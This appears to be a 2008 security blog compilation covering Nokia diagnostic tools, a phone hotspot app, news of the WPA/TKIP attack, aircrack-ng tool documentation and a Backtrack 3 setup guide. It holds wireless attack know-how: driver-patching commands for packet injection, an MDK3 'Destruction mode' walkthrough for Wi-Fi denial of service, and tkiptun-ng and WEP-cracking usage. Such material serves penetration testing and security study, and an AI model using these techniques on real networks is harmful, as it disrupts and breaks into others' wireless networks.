Information on the 1st, 2nd, 3rd, 4th, 5th, 6th, 7th, 8th neighbours.
Network selection display.
System information bits for the service cell.
Paging repeat period, TMSI, periodic location update.
Network parameters.
Ciphering, hoping DTX status and IMSI.
Uplink DTX switching display.
BTS-TEST carrier: lock / unlock on one BTS frequency.
Toggle cell barred status.
Select which band to use: GSM 900 - GSM 1800 - GSM 1900

Full GPRS signaling displays:
Information on the current GPRS state and previous TBF configuration:
- Hoping, Channel carrier number, RX level, Timing advance, Downlink time slot, Uplink time slot, Channel coding scheme downlink/uplink, Timing advance index, TFI and MAC mode for TBF config, Type of current channel, UFS values...
Previous UL TBF establishment.
Information on the GMM state.
Values of P-TMSI, RAC, SMS radio priority, Ciphering and Non-DRX parameters.
GPRS Network parameters.
Packet control channel parameters.
Packet system information parameters.
GPRS information on the serving cell and neighbors..

And many more...

Installation notes:

Copy/Move
FtdApp_reg.rsc to C:/Private/10003a3f/import/Apps

Copy/Move
Ftd.mbm, Ftd.mif, ftd.rsc, Ftd_aif.mif, ftdata_wk15_07.dat, ftdata_wk41_06.dat, Alarm.rsc, AlarmList.mbm, CallEnd.rsc, Custom.rsc to C:/Resource/Apps

Copy/Move
ftd.dll55l to C:/Resource/Plugins

Copy/Move
FTD.exe, FtDaInterface.dll, ftdaserver.exe, FtDbInterface.dll, ftdbserver.exe, FtdGwcTest.exe, FtEngine.dll to C:/Sys/Bin

For application icon in SymbianOS 9.1 use the file in attachment.

Tested on
N73, N95, N95 8GB, 6120c, 6290, 5700, E65, E51, E90.

Compatibiltiy:
Should work on all S60v3 devices

JoikuSpot Light v2.1 Beta S60v3 SymbianOS [Updated - 31st July '08]

2008-11-24T06:48:00.002-08:00

JoikuSpot is FREE and SECURE Mobile HotSpot solution that turns Nokia phones to a WLAN HotSpot.

JoikuSpot software is installed directly to the phone. When switched on, laptops and iPods can establish instant, secure and fast WLAN connection via smartphone's JoikuSpot HotSpot using phone's own 3G internet connection.

Multiple devices can connect to JoikuSpot in parallel and seamlessly share the same 3G internet connection.

You can use JoikuSpot to access internet e.g. on the train, car, sailing boat, summer cottage, hotel, while walking, or when at remote office...where ever you are!

Release notes for JoikuSpot Light:
-Landing page works with all operators
-Encryption support with WEP including 128bit key generator
-Battery threshold shutting down the client when battery level is too low
-Default Access point setting
-Support for secure SSH tunnels with Putty
-MapSpot 1.0 support for GPS HotSpot location identification with external mapping services such as Google Maps

All settings can be adjusted after JoikuSpot is stopped, just press the Stop key.

Please uninstall the previous version before updating your JoikuSpot. Just go Tools --> Application management on your Nokia phone.

JoikuSpot works with Nokia S60 3rd Ed phones. For Windows Mobile version, please download WMWifiRouter.

JoikuSpot requires that you have a working Internet connection in the phone. WAP connection sharing is NOT supported.

Please make sure that you have the latest firmware on the phone. You can easily update it with Nokia Software Updater.

JoikuSpot Light supports HTTP and HTTPS protocols. This means that you can browse web and also secure sites (webmails, banks). HTTPS requires that "Automatic proxy configuration" is set on your web browser. See User guide for easy setup.

Other protocols such as IMAP (mail) or FTP are not part of Light Edition. We will soon launch a commercial Premium Edition with full protocol support. Light Edition will continue to stay free.

HTTPS settings for Apple iTouch:
Go Settings --> Wi-fi and select JoikuSpot network. Go to bottom and set HTTP proxy to Auto. TIP for some phone models and iTouch combinations:
Try auto configuration url http://192.168.2.1/wpad.dat or set HTTPS proxy as 192.168.2.1 port 80

Known issues:

-JoikuSpot has been tested successfully with several laptops: Fujitsu-Siemens, Apple Macbook, Dell, HP and new IBM models seem to work well. Older laptops might have an issue with the WLAN chipset.

-PSP and Nintendo DS require WLAN infrastructure mode and
Symbian does not support it yet. We are looking into it and discussing with Symbian.

-If you have firewall program installed in your smartphone (F-Secure Mobile Security e.g.), try lowering the security level. We shall do a fix for this to final version.

-Some operators (at least in UK) require that you have to go to their store and prove that you are over 18 in order to browse the web. Otherwise you will be limited just to their own sites. This in not a bug in JoikuSpot, it also applies to all web surfing. Try accessing the web through 3G first with phone's web browser to see if your access is limited.

Counter measurements of FTE against copying their Bluetooth sniffer

2008-11-24T06:48:00.001-08:00

FTE is finally reacting on the fact that you can easily copy their Comprobes firmware to other, regular Bluetooth USB dongles. First, with their new hardware they released earlier this year, also the structure of the firmware has changed. Therefore the newer firmware wont work out of the box the good old way.

Second they seem to have changed their licensing policy. You have to register your software (with your license key) of FTE4BTonline. And, that’s the funny thing, seems that you also have to ‘de-register’ your software online. Means: when you want to install your software somewhere else, de-install it on the other PC and ‘de-register’ it online. Then install it on the other PC.

source: http://www.evilgenius.de/

Sucking Data off of Cell Phones

2008-11-24T06:47:00.000-08:00

There is a new electronic capture device that has been developed primarily for law enforcement, surveillance, and intelligence operations that is also available to the public. It is called the Cellular Seizure Investigation Stick, or CSI Stick as a clever acronym. It is manufactured by a company called Paraben, and is a self-contained module about the size of a BIC lighter. It plugs directly into most Motorola and Samsung cell phones to capture all data that they contain. More phones will be added to the list, including many from Nokia, RIM, LG and others, in the next generation, to be released shortly.

Packet Injection wifi Intel 4965 AGN

2008-11-24T06:46:00.000-08:00

Tutorial for packet injection Intel Pro Wireless 4965AGN (iwl4965)
What do you need:
- kernel 2.6.25 or higher*,
- kernel sources,
- compat-wireless-2.6 packet,
- aircrack-ng (=””> RC1),
- basic development tools (make, gcc, …),
- injection patche for driver.
Be aware that the instruction is for generic Linux. Your distribution, mainly in case of advanced packet administration (Debian, Ubuntu, etc.), can include required packets in source (then you don’t have to compile it manually from source code).

Preparation of kernel
Make sure that your kernel configuration includes mentioned configuration. Especially watch out for those that are as modules built-in and those that can be added.

Networking -> Wireless :
[M] Improved wireless configuration API
[*] nl80211 new netlink interface support
[*] Wireless extensions
[M] Generic IEEE 802.11 Networking Stack (mac80211)
[M] Generic IEEE 802.11 Networking Stack (DEPRECATED)
[M] IEEE 802.11 WEP encryption (802.1x)
[M] IEEE 802.11i CCMP support
[M] IEEE 802.11i TKIP encryption
[M] Software MAC add-on to the IEEE 802.11 networking stack

It is also necessary to turn on “Automatic kernel module loading” under “Loadable module support”, otherwise you will end if “module dependency errors”. At this moment you can suppose that your kernel is prepared and is running.

Driver compilation
Development version of drivers exists as a part of compat-wireless project. We will need the up-to-date packet. You can get it here.
Download to your home folder (or where ever you want),then download patches for iwlwifi drivers, including fragmentation patch for mac80211. Last mentioned is available here (download 2.6.26-wl version). The first available is hang up at paste.bin.

cd ~
tar xjf compat-wireless-2.6.tar.bz2
cd compat-wireless-2008-*
wget http://pastebin.com/pastebin.php?dl=f7bc96631 -O iwl4965-injection.patch
wget http://patches.aircrack-ng.org/mac80211_2.6.26-wl_frag.patch
patch -p1 < iwl4965-injection.patch
patch -p1 < mac80211_2.6.26-wl_frag.patch
make
make install [jako root!]
make unload; rmmod ssb mac80211 cfg80211 [all as root!]
make load [as root!]
echo options iwl4965 swcrypto=1 >> /etc/modprobe.d/options [all as root!]

This will allow to start it and to use the treated driver module. In case of success in the system there is registered interface “wlan0″ and “wmaster0″, the first can be seen by iwconfig.

Injecting
From the way how mac80211 works it is obvious that you can’t inject at the original interface wlan0. This is the moment when you can use the tool airmon-ng. By this tool you will create the interface mon0 that is able to do packet injection. Command:

# airmon-ng start wlan0

If the word error appears “iw”, program not found, download and compile. Program “iw” is pendent to “libnl” pack (downloadable here). If it is successful you can try again to run airmon-ng. The output should look like this:

# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 4965 a/b/g/n iwl4965 - [phy0] (monitor mode enabled on mon0)

If you made it up to here your wireless card is probably ready for packet injection. Interface mon0 can be used for airodump-ng scan and aireplay-ng packet injection.

First reference and tutorial was published (in English) at tinyshell forum. The text is a translation from the record at aircrack-ng wiki. Detailed description can be found in the discussion here. The summary of steps for Ubuntu 8.04 (or here). The card ipw4965 is not at this moment available, so do the testing and your comments are welcomed at the discussion forum.
via airdump.net

Destruction Mode Charon 2 GUI

2008-11-24T06:45:00.000-08:00

Last year we told about not so well know tool called MDK, as part of the “Cracking WEP key - Acces Point with pree-shared key (PSK” concept. Alot of time has passed by since then and now we have well workiong stable version even with GUI extension Charon. It was not much of a deal in Fall 2007, but the situation has changed. The autor has also decidedd to eneble the Destruction Mode in the menu. The extension is written in Java and is very stable. If you have not encountered the MDK tool before, it is a proof-of-concept tool from the authors of the PTW implementation in aircrack-ng (Darmstadt Lab).

It tses 8 concepts of attacking wireless networks.

b - Beacon Flood Mode sends beacon frames and confuses the client by creating fake APs. This is able to make AP scanning applications and devices unusable
a - Authentication DoS mode sends auth frames to all APs in range. This results in freezinig or restarting devices
p - Basic probing a ESSID Bruteforce mode sends probe requests to APs and checks replys
d - Deauthentication / Disassociation Amok Mode. Disconnects AP’s all clients
m - Michael shutdown exploitation (TKIP). Permanetnly interrupts all communication in the wireless network
x - Penetration test for 802.1X
w - WIDS/WIPS Confusion.
f - MAC filter bruteforce mode (works only on APs that use proper open auth denial)

The GUI interface makes clicking tool out of MDK and allows the use of the already mentioned Destruction Mode. Just so you know what really happens, it’s scenario is described below:

Destruction mode
Destruction mode combines several attacks. This attack renders IDS Cisco useless. On system that dont colapse, it at least breaks the routing table. In the last version, the proccess is semi-automatic.

1. Beacon flood generates fake Access Points with the victim’s SSID
2. Auth-DoS floods victim’s AP with auth requests (ini inteligentnt mode)
3. Amok mode dissasociates clients from the AP
4. WIDS confusion mód connects the clients via fake APs back to the ‘real’ AP

In result, noone is able to connect because Amok mode disconnects anyone who tries, clients detect thousands of AP with no clue on whichone is the realone. That will produce a nice beacon flood. The real AP will be too busy processing auth frames generated by Auth-DoS.

Interface description
Each mode opens a new interface. The main menu

Charon Auth Flood mode
Charon Deauth Flood mode
Charon Decloacking mode
Charon Deny Trafic mode
Charon Destruction mode
Charon Fake Access Point mode
Charon MAC Brute Force mode
Charon WIDS mode

Every output has it’s own control panel.

Charon is available in lzm pack (ready out-of-the-box is only in Slackware), MDK wili run on any Linux based distribution. Charon with the latest versioin of MDK3 is available in the download section. Don’t forget the wlanconfig ath0 destroy / wlanconfig ath0 create wlandev wifi0 wlanmode monitor before pentesting (when full support of VAP cards such as Atheros will be done). Corrently the supported chipsets are ipw3945 and rt73. Ps: The pack even includes airchucknorris-ng 3 , but well tell you about that next time.
via airdump.net

WPA Wi-Fi Security Gets Cracked

2008-11-24T06:44:00.002-08:00

Your Network is No Longer Secure

When it came to setting up Wi-Fi networks, if you knew what you were doing you would enable WPA security. This would keep people with a small amount of knowledge from gaining access to your network, which is very easy with the much weaker WEP security. No more! WPA security has now been cracked, rendering all but the most tightly-locked networks open for hacking.

Researchers by the name of Erik Tews and Martin Beck were the ones to do the cracking, finding a way to break the temporary Key Integrity Protocol (TKIP) in under 15 minutes. They haven't, however, figured out how to gain access to the data that travels between the PC and the router, so that's a plus.

So what should you do to secure your network? Switch to WPA2, which is still uncracked for the time being. And if you want to be one of those marginally-skilled Wi-Fi hackers? Grab the Aircrack-ng Linux program, which has already had this new code added to it.
via gizmodo.com

tkiptun-ng

2008-11-24T06:44:00.001-08:00

It is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames in a WPA TKIP network with QoS.

He worked a few weeks ago with Erik Tews (who created PTW attack) for a conference in PacSec 2008: “Gone in 900 Seconds, Some Crypto Issues with WPA”.

WPA wireless encryption cracked

2008-11-24T06:42:00.000-08:00

Researchers have found a method of cracking a key encryption feature used in securing wireless systems that doesn't require trying a large number of possibilities. Details will be discussed at the sixth annual PacSec conference in Tokyo next week.

According to PCWorld, researchers Erik Tews and Martin Beck have found a way to crack the Temporal Key Integrity Protocol (TKIP) key, used by Wi-Fi Protected Access (WPA). Moreover, they can do so in about 15 minutes. The crack apparently only works for data aimed at a Wi-Fi adapter; they have not cracked the encryption keys used to secure data that goes from the PC to the router

TKIP has been known to be vulnerable when using a high volume of educated guesses, or what's called a dictionary attack. The methods to be described by Tews and Beck do not use a dictionary attack. Apparently their attack uses a flood of data from the WPA router combined with a mathematical trick that cracks the encryption.

Some elements of the crack have already been added to Beck's Aircrack-ng Wi-Fi encryption hacking tool used by penetration testers and others.

Tews is no stranger to cracking Wi-Fi encryption. In 2007, he broke 104-bit WEP (Wired Equivalent Privacy) (PDF) in 2007. WEP was used by TJX Corp. to secure wireless cash register transmissions from its stores but criminals were able to exploit weaknesses in its encryption to commit the largest data breach in U.S. history.

Given that WEP and WPA are not secure, experts recommend using WPA2 when securing wireless networks.
via news.cnet.com

Download tkiptun-ng and airdecloak-ng

ath5k frequency patch

Tkiptun-ng

2008-11-24T06:41:00.002-08:00

Tkiptun-ng

Description
NOTE: This documention is still under development. Please check back on a regular basis to obtain the latest updates. If you have any feedback on the documentation, please post your comments to the Forum.

NOTE: The tkiptun-ng SVN version is not fully working. A working version will be released shortly.

Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS. He worked with Erik Tews (who created PTW attack) for a conference in PacSec 2008: “Gone in 900 Seconds, Some Crypto Issues with WPA”.

Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. This attack is described in the paper, Practical attacks against WEP and WPA written by Martin Beck and Erik Tews. The paper describes advanced attacks on WEP and the first practical attack on WPA. An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article Battered, but not broken: understanding the WPA crack by Glenn Fleishman.

Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). This is done via chopchop-type method. Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated.

At this point, tkiptun-ng has recovered the MIC key and knows a keystram for access point to client communication. Subsequently, using the XOR file, you can create new packets and inject them. The creation and injection are done using the other aircrack-ng suite tools.

Please remember this is an extremely advanced attack. You require advanced linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED.

General Requirements
Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.

The AP must be configured for WPA plus TKIP.

A fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes.

Specific Requirements
The network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.

Why?
This section is very preliminary. As tkiptun-ng works, it goes through various phases. People ask “Why is such and such done?”. This section attempts to answer those questions.

Question:
Why is the handshake gathered?

Answer:
It is done for debugging reasons. First, so that the temporal keys in tkiptun can be calculated. Seocnd, check them against the calculated values from the plaintext packet.

Another reason, is to check if the AP/client reuses the nonces after a mic shutdown.

Usage
Usage: tkiptun-ng

Filter options:

-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-D : disable AP detection
Replay options:

-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-F : choose first matching packet
-e essid : set target AP SSID
Debug options:

-K prga : keystream for continuation
-y file : keystream-file for continuation
-j : inject FromDS packets
-P pmk : pmk for verification/vuln testing
-p psk : psk to calculate pmk with essid
Source options:

-i iface : capture packets from this interface
-r file : extract packets from this pcap file

--help : Displays this usage screen
Usage Examples
The example below is incomplete but it gives some idea of how it looks.

Input: tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 ath0

Output:

Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
14:48:00 Michael Test: Successful
14:48:00 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
14:48:00 Found specified AP
14:48:00 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs]
14:48:02 WPA handshake: 00:14:6C:7E:40:80 captured
14:48:02 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-1109-144822.cap
14:48:22 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-1109-144822.cap
14:48:22 Got the answer!
14:48:22 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.

Sent 40 packets, current guess: 27..

Airdecloak-ng

2008-11-24T06:41:00.001-08:00

Airdecloak-ng is a tool that removes wep cloaking from a pcap file. Some WIPS (actually one) can actively “prevent” cracking a WEP key by inserting chaff (fake wep frames) in the air to fool aircrack-ng. In some rare cases, cloaking fails and the key can be recovered without removing this chaff. In the cases where the key cannot be recovered, use this tool to filter out chaff.

The program works by reading the input file and selecting packets from a specific network. Each selected packet is put into a list and classified (default status is “unknown”). Filters are then applied (in the order specified by the user) on this list. They will change the status of the packets (unknown, uncloaked, potentially cloaked or cloaked). The order of the filters is really important since each filter will base its analysis amongst other things on the status of the packets and different orders will give different results.

Important requirement: The pcap file needs to have all packets (including beacons and all other “useless” packets) for the analysis (and if possible, prism/radiotap headers).

Options
Option Explanation
-i Path to the capture file.
–bssid BSSID of the network to filter.
–ssid ESSID of the network to filter (not yet implemented).
–filters Apply theses filters in this specific order. They have to be separated by a ','.
Example: –filters signal,consecutive_sn
–null-packets Assume that null packets can be cloaked (not yet implemented).
–disable-base_filter Disable the base filter.
–drop-frag Drop all fragmented packets. In most networks, fragmentation is not needed.

Airtun-ng

2008-11-24T06:40:00.001-08:00

Airtun-ng is a virtual tunnel interface creator. There are two basic functions:

Allow all encrypted traffic to be monitored for wireless Intrusion Detection System (wIDS) purposes.
Inject arbitrary traffic into a network.

In order to perform wIDS data gathering, you must have the encryption key and the bssid for the network you wish to monitor. Airtun-ng decrypts all the traffic for the specific network and passes it to a traditional IDS system such as snort.

Traffic injection can be fully bidirectional if you have the full encyption key. It is outgoing unidirectional if you have the PRGA obtained via chopchop or fragmentation attacks. The prime advantage of airtun-ng over the other injection tools in the aircrack-ng suite is that you may use any tool subsequently to create, inject or sniff packets.

Airtun-ng also has repeater and tcpreplay-type functionality. There is a repeater function which allows you to replay all traffic sniffed through a wireless device (interface specified by -i at0) and optionally filter the traffic by a bssid together with a network mask and replay the remaining traffic. While doing this, you can still use the tun interface while repeating. As well, a pcap file read feature allows you to replay stored pcap-format packet captures just the way you captured them in the first place. This is essentially tcpreplay functionality for wifi.

Airtun-ng only runs on linux platforms and does not support WDS.

Packetforge-ng

2008-11-24T06:39:00.002-08:00

The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection.

To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file. This is used to encrypt the packet you create. This is typically obtained from aireplay-ng chopchop or fragmentation attacks.

Wesside-ng

2008-11-24T06:39:00.001-08:00

Wesside-ng is an auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme, reinject ARP requests and finally determine the WEP key. All this is done without your intervention.

The original wesside tool was written by Andrea Bittau and was a proof-of-concept program to accompany two published papers. The two papers are “The Fragmentation Attack in Practice” by Andrea Bittau and “The Final Nail in WEP's Coffin” by Andrea Bittau, Mark Handley and Josua Lockey. See the the links page for these papers and more. The papers referenced provide excellent background information if you would like to understand the underlying methodologies. The concepts for the fragment attack currently incorporated in aircrack-ng came from these papers.

For you trivia buffs, who knows where the program name “wesside” came from? As it turns out, it comes from tupac the rapper (2Pac / Tupac Shakur).

Wesside-ng has been updated to reflect advances in determining the WEP key. Here are the steps which wesside-ng takes:

Channel hops looking for a WEP network.
Once a network is found, it tries to authenticate. If authentication fails, then the program attempts to find a MAC address currently associated with the AP to spoof.
Once the program has successfully authenticated then it associates with the AP.
After sniffing a single data packet, it proceeds to discover at least 128 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. This is what is known as the fragmentation attack. The PRGA is written to the prga.log file.
After it sniffs an ARP request, it decrypts the IP address by guessing the next four bytes of PRGA using multicast frames and the linear keystream expansion technique. By decrypting the ARP request, the network number scheme can be determined plus the source IP of ARP request. This is used to build the ARP request which is used for subsequent injection.
It floods the network with ARP requests for the decrypted IP address.
Launches the aircrack-ng PTW attack to determine the WEP key.
So you may be asking “What is the linear keystream expansion technique?”. The foundation is the fact that packets like an encrypted ARP request can easily be identified combined with the fact that the start of it has known plain text. So the program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one more byte then the know PRGA and the PRGA is guessed for the extra byte. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.

There are a few known limitations:

Only open authentication is support. Shared key authentication is not supported.
Only B and G networks are supported.
Fake MAC functionality is broken if there is a lot of traffic on the network.
Please remember that this is still basically a proof-of-concept tool so you can expect to find bugs. Plus you will find features that don't quite work as expected. Consider using easside-ng as an alternative or a companion program. Easside-ng is considered relatively stable software.

Easside-ng

2008-11-24T06:38:00.001-08:00

Easside-ng is an auto-magic tool which allows you to communicate via an WEP-encrypted access point (AP) without knowing the WEP key. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme and then setup a TAP interface so that you can communicate with the AP without requiring the WEP key. All this is done without your intervention.

There are two primary papers “The Fragmentation Attack in Practice” by Andrea Bittau and “The Final Nail in WEP's Coffin” by Andrea Bittau, Mark Handley and Josua Lockey which are of interest. See the the links page for these papers and more. The papers referenced provide excellent background information if you would like to understand the underlying methodologies. The concepts for the fragment attack currently incorporated in aircrack-ng came from these papers.

In order to access the wireless network without knowing the WEP key is done by having the AP itself decrypt the packets. This is achieved having a “buddy” process running on a server accessible on the Internet. This “buddy” server echoes back the decrypted packets to the system running easside-ng. This imposes a number of critical requirements for easside-ng to work:

The target access point must be able to communicate with the Internet.
A “buddy” server must exist on the Internet without firewalling of the port used by easside-ng. The default is TCP and UDP port 6969.
The system running easside-ng must have access to the Internet and be able to communicate with the “buddy” server.
There are two overall phases:

Establish basic connectivity between easside-ng, buddy server and the access point.
Communication with the WIFI network.

Installing Backtrack 3 under VirtualBox

2008-11-24T06:36:00.000-08:00

Installing Backtrack 3 under VirtualBox

Intro: This is a Tutorial on how to install Backtrack 3 (Linux) on Windows XP so you will
be able to run both Windows and Backtrack 3 (Linux) at the same time without rebooting.

It is written "skiny" so you can read it on one side of the screen and install Backtrack 3 in
VirtualBox on the other side of the screen.

The text "hxxp://." means to use http and add "www" .

In this Tutorial we will be using the free virtualization tool VirtualBox. If you have ever
used VMWare then the procedure is similar but there are a few more steps (and the
ability to directly access your hardware (ONLY if you have a NEW computer that supports
either VT-x or AMD-V)).

I have Backtrack 3 working perfectly and can boot from my harddrive, your results may be
better (or worse) depending on: your computer, your "Wireless Network Adapter" driver,
your choice of "Wireless Network Adapter" card and your abilities in general.

It is also possible to use VirtualBox the other way around, to install Windows on Linux.

You can have Linux directly access your hardware and use the virtualization to run Debian,
Windows XP, and Backtrack 3 (Slackware Linux) all at the same time. If you run VirtualBox
under Debian GNU/Linux and use VirtualBox to virtualize both Windows XP and Backtrack 3
then you won't have to worry about not getting direct access to your hardware and all of
Backtrack 3's programs should work correctly.

Running Backtrack 3 under VirtualBox on a Windows Host means that some of Backtrack 3's
programs will not work for some people (depending on your setup) but you can use most
of the tools to analyze packets that you have already captured with OmniPeek for Windows.

One of the best features (other than the ability to run Linux and Windows at the same
time) is that booting is quick and any changes you make are sticky between boots. You
can take Snapshots of your system and restore to previous versions if you get hit with
a virus (or type the wrong command).

Please note that this is an ADVANCED tutorial so Google before you ask for help!

----- Getting the software needed for this installation -----

Go to the Remote Exploit Website and visit the download page, obtain "bt3final_usb.iso".

BackTrack Downloads
hxxp://.remote-exploit.org/backtrack_download.html

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
hxxp://.remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Go to the VirtualBox Website and visit the download page, obtain "VirtualBox-2.0.2-36488-Win_x86.msi".

VirtualBox binaries
hxxp://.virtualbox.org/wiki/Downloads

VirtualBox 2.0.2 for Windows hosts x86
hxxp://download.virtualbox.org/virtualbox/2.0.2/VirtualBox-2.0.2-36488-Win_x86.msi

----- Installing VirtualBox 2.0.2 for Windows -----

Double click on the "VirtualBox-2.0.2-36488-Win_x86.msi" file. Reboot. Come back here.

----- Installing Backtrack 3 under VirtualBox -----

1.): Start VirtualBox and choose the "New" button.

2.): Name the Virtual Machine "Backtrack 3" and choose "Linux 2.6" for the "OS Type". Click the "Next" button.

3.): For the "Base Memory Size" choose at least 512k. I suggest 1024k if you have 3G of RAM. Click the "Next" button.

4.): On the "Virtual Hard Disk" pane click "New", click the "Next" button.
Choose the "Fixed-size Image" Radio Button, click the "Next" button.
Click the "Select Button" and choose a drive to store your Virtual Disk images.
Click on the "Create New Folder" icon and create a new directory called "Backtrack3".
Click on the newly created directory and type "Backtrack3_boot" as the "File Name", click the "Save" button.
You are back at the "Virtual Hard Disk" pane.
The "Image File Name" would now be something like: "C:\Backtrack3\Backtrack3_boot.vdi".
Leave the "Image Size" at 8GB, click the "Next" button.
Check that everything is correct, click the "Finish" button.
Wait about 2 minutes while the new "Virtual Hard Disk" is created.
Wait until you are back at the "Virtual Hard Disk" pane.
The "Boot Hard Disk (Primary Master)" would now be: "Backtrack3_boot.vdi (C:\Backtrack3)".
Click the "Next" button.
5.): You are now at the "Summary" pane. Check that everything is correct, click the "Finish" button.

6.): You will now have exited the "Wizard" and be on the "Details" tab.

7.): Click on the "CD/DVD-ROM" (Not mounted) area.
Click the "Mount CD/DVD Drive" checkbox.
Click the "ISO Image File", "Radio Button", click on the "Select Button".
In the "Virtual Disk Manager" pane click the "Add" button.
Look for your file: "bt3final_usb.iso" and click on it, choose open. Click "Select".
The "ISO Image File" would now be something like: "bt3final_usb.iso (C:\Downloads)".
8.): In the left panel of the "Settings" pane click on "General". You should be on the "Basic" tab.

9.): In the "General", "Settings", "Basic" tab you can change the "Video Memory Size" from
8MB to 120MB (120MB). If you use 120MB (120!) of memory for the "Video Memory Size" then
you should be OK. If you choose 128MB of memory then VirtualBox will crash on my machine
(but you should test it on yours). When I look at KDE's "Start", "System", "System Information",
"PCI" it says my "InnoTek VGA Compatible Controller" has only 8MB of memory, that makes
little sense since I can run 1024x768x24. If someone can get 32 bit graphics let us know.

When you get the X Window started (try the boot option "VESA KDE") there are only three video
modes available in KDE's "System", "Settings", "Hardware", "Configure Display". These are
"1024x768x16x85Hz", "800x600x16x85Hz", and, (least of all), "640x480x16x85Hz". Not great.

It is likely you will want to read Section 4.3.2 of the VirtualBox "UserManual.pdf", edit
Backtrack 3's "/etc/X11/xorg.conf" and then add this (or alter existing) section in xorg.conf:

Code:
Advice about "/etc/X11/xorg.conf" was deleted, see bottom of post.Read Section 9.5 of the Sun xVM VirtualBox Help "Custom VESA Resolutions" if you want to
change the 'text mode' screen run this command (and modify your kernel params) (this did
not work for me but the error message gives other numbers to use):

"C:\Program Files\Sun\xVM VirtualBox\VBoxManage" setextradata VMNAME "CustomVideoMode1" "1400x1050x32"

The VESA mode IDs for custom video modes start at 0x160. In order to use the above defined
custom video mode, the following command line has be supplied to Linux (by editing your boot
command line ("TAB" key when booting):

vga = 0x200 | 0x160
vga = 864

I tried to run xorgconfig to create an updated "/etc/X11/xorg.conf" and found that the
VirtualBox Video Driver will only support certain modes while letting the X Server reinitialize
the GUI correctly. It is possible to choose amongst many video modes but unfortunately
most will confuse the X server as to what the actual screen size is and result in the
Toolbar being drawn offscreen. If you get in this situation just right-click on the Desktop
and choose "Configure Desktop", "Display" and choose screen size 1024x768@85Hz
(assuming you don't delete this setting from "/etc/X11/xorg.conf").

----------

Revision - Fixes for ' /etc/X11/xorg.conf ' :

You could add this section to enable translucency and shadows (it may slow things down
(depending on your theme, some translucency is very slow) but allows fancier themes).

Code:
Section "Extensions"
Option "Composite" "Enable"
EndSection

You should add / change these sections to enable more choices of Display size.

Prior to the "Monitor section" add these lines (CHANGE the BusID line to suit your system - you
might get away with commenting it out):

Code:
Section "Device"
Identifier "Generic Video Card"
Driver "vboxvideo"
BusID "PCI:0:2:0"
EndSection
# *********************************************************
# Monitor section
In the ' Section "Monitor" / Identifier "My Monitor" ' section try these settings:

Code:
HorizSync 28-96
VertRefresh 43-85
# Add
Option "DPMS"
In the ' Section "Device" ' section try this:

Code:
Section "Device"
# Identifier "VESA Framebuffer"
Identifier "Generic Video Card"
Driver "vboxvideo"
EndSection
In the ' Section "Screen" ' section try this:

Code:
Section "Screen"
Identifier "Screen 1"
# Device "VESA Framebuffer"
Device "Generic Video Card"
Monitor "My Monitor"
Now you should be able to change this subsection in the ' Section "Screen" ' section and have the
values work properly. Check this in [Start] -> System -> Settings -> Hardware -> Display .

No more "Draw ToolBar Offscreen" Bug.

Code:
Subsection "Display"
Depth 24
# Modes "1024x768" "800x600" "640x480"
Modes "1024x768" "1280x1024" "1152x864" "1400x1050" "1600x1200" "1800x1400" "800x600" "640x480"
ViewPort 0 0
EndSubsection
I am more familiar with Debian (Lenny) than Slackware. I am able to boot Lenny in 24Bit mode
without VirtualBox's annoying messages about screen mode that occur when booting Slackware.

These changes to /etc/X11/xorg.conf work in VirtualBox on both Lenny and Slackware so they are
more specific to X11 in VirtualBox than they are to either Operating System. This is good.

I am still using the "VESA KDE" boot option.

write by Nokii@forums.remote-exploit.org

Installing Backtrack 3 under VirtualBox - Part 2

2008-11-24T06:29:00.001-08:00

10.): In the "General", "Settings", "Advanced" tab you should do the following:
Click the "Boot Order", "Floppy" checkbox to uncheck it.
The "CD/DVD-ROM" should be the first boot device (for installation only).
You can leave the "Boot Order", "Hard Disk" checkbox checked, you will re-order the drives later.
